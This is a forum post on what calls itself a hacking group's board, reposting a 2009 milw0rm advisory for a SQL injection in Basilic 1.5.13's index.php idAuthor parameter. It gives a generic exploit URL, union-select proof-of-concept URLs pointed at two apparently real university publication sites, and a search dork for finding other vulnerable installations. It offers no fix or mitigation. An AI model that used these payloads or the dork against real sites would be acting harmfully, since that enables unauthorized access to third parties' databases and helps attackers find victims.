Multi Ethnic Hacking Group


    Basilic 1.5.13 (index.php idAuthor) SQL Injection Vulnerability

    Share

    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    Basilic 1.5.13 (index.php idAuthor) SQL Injection Vulnerability

    Post by Foxi on Sat Jul 25, 2009 11:43 am

    Code:
    ==================================================================================================


      [o] Basilic 1.5.13 SQL Injection Vulnerability

          Software : Basilic version 1.5.13
          Vendor  : http://artis.imag.fr/Software/Basilic/
          Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz
          Author  : NoGe
          Contact  : noge[dot]code[at]gmail[dot]com
          Blog    : http://evilc0de.blogspot.com


    ==================================================================================================


      [o] Vulnerable file


          index.php



      [o] Exploit

          http://localhost/[path]/index.php?idAuthor=[SQL]



      [o] Proof of concept

          http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--
          http://www.iarc.uaf.edu/publications/allpubs.php?idAuthor=-19+union+select+1,version()--



      [o] Dork

          "Powered by Basilic"


    ==================================================================================================


      [o] Greetz

          MainHack BrotherHood [ http://mainhack.net ]
          Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
          H312Y yooogy mousekill }^-^{ loqsa zxvf
          skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


    ==================================================================================================

    # milw0rm.com [2009-07-24]


      Current date/time is Fri Jan 20, 2017 11:52 am